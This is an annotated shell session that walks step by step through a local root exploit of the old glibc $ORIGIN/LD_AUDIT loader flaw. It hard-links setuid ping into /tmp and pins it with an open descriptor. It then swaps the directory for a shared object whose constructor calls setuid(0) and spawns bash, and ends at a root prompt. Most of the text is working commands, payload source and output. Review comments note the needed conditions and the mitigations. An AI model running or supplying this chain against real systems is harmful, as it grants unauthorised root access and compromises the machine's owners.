# Session transcript (prompts and command output recorded verbatim, not a runnable script).
# Step 1: confirm /tmp is world-writable with the sticky bit set (drwxrwxrwt) -- any user
# can create entries here, which is what the rest of the session relies on.
[Star@localhost tmp]$ ls -ld /tmp/
drwxrwxrwt 11 root root 4096 10-14 21:29 /tmp/
[Star@localhost tmp]$ cd /tmp/
# Step 2: hard-link /bin/ping under a directory we control. A hard link shares the inode,
# so the link keeps ping's mode bits; the attack assumes ping is installed setuid root --
# not shown in this transcript, confirm with `ls -l /bin/ping` before reproducing.
# `ln` only succeeds when /tmp and /bin are on the same filesystem, and on kernels with
# fs.protected_hardlinks=1 (3.6+) an unprivileged user cannot hard-link a file they do not own
# -- either condition stops the chain at this line (NOTE(review): not demonstrated here).
[Star@localhost tmp]$ mkdir exploit
[Star@localhost tmp]$ ln /bin/ping /tmp/exploit/target
# Step 3: open the link read-only on fd 3 of the interactive shell. The open descriptor pins
# the inode, so the binary stays reachable via /proc/<pid>/fd/3 after the path is removed.
[Star@localhost tmp]$ exec 3< /tmp/exploit/target
[Star@localhost tmp]$ ls -l /proc/$$/fd/3
lr-x------ 1 hello hello 64 10-20 09:30 /proc/10990/fd/3 -> /tmp/exploit/target
# Step 4: delete the directory. The descriptor still resolves (kernel appends "(deleted)"),
# and the name /tmp/exploit is now free to be reused for a regular file.
[Star@localhost tmp]$ rm -fr /tmp/exploit/
[Star@localhost tmp]$ ls -l /proc/$$/fd/3
lr-x------ 1 hello hello 64 10-20 09:30 /proc/10990/fd/3 -> /tmp/exploit/target (deleted)
# Step 5: write the payload source from stdin (input is ended with Ctrl-D, not shown).
[Star@localhost tmp]$ cat > payload.c
/*
 * Payload run automatically when this shared object is loaded: the constructor
 * attribute makes the loader call init() at load time, before the host program's
 * main(). It is compiled without headers and with -w, so setuid()/system() are
 * used with implicit declarations.
 *
 * Order matters and is the whole point of the payload: setuid(0) is issued first
 * so that, when the loading process already has effective uid 0, the real uid
 * becomes 0 as well (assumption: the host is a setuid-root binary -- confirm in
 * the surrounding session). Only then is a shell spawned; presumably bash would
 * otherwise drop the elevated effective uid on start-up because it differs from
 * the real uid -- NOTE(review): this depends on the shell's privileged-mode
 * behaviour and is not demonstrated here.
 *
 * The return value of setuid() is not checked; if it fails the shell is still
 * spawned, just unprivileged.
 */
void __attribute__((constructor)) init()
{
setuid(0);            /* make ruid/euid/suid all 0 -- requires euid 0 already */
system("/bin/bash");  /* interactive shell inherits the uid set above */
}
# Step 6: build the payload as a shared object at /tmp/exploit -- the exact path that was
# the parent directory of the still-open link target. -w silences the implicit-declaration
# warnings from the header-less source.
[Star@localhost tmp]$ gcc -w -fPIC -shared -o /tmp/exploit payload.c
[Star@localhost tmp]$ ls -l /tmp/exploit
-rwxrwxr-x 1 hello hello 4223 10-20 09:32 /tmp/exploit
# Step 7: exec the pinned setuid binary through /proc/self/fd/3 with LD_AUDIT set to the
# literal string $ORIGIN (the backslash stops the shell from expanding it). The dynamic
# loader expands $ORIGIN to the directory of the executable, which /proc reports as
# /tmp/exploit/target, i.e. $ORIGIN = /tmp/exploit = our shared object, so it is loaded as
# the audit library and init() runs with ping's privileges.
# NOTE(review): the bug being exercised is the loader honouring $ORIGIN in LD_AUDIT for a
# setuid executable; this matches the 2010 glibc ld.so issue (CVE-2010-3847) -- confirm
# against the glibc version on the target. Patched loaders ignore/unset LD_AUDIT for
# setuid programs, and fs.protected_hardlinks or a separate/nosuid /tmp also breaks the
# chain earlier.
[Star@localhost tmp]$ LD_AUDIT="\$ORIGIN" exec /proc/self/fd/3
# The prompt changes from $ to #: the resulting shell is root.
[Star@localhost tmp]# whoami
root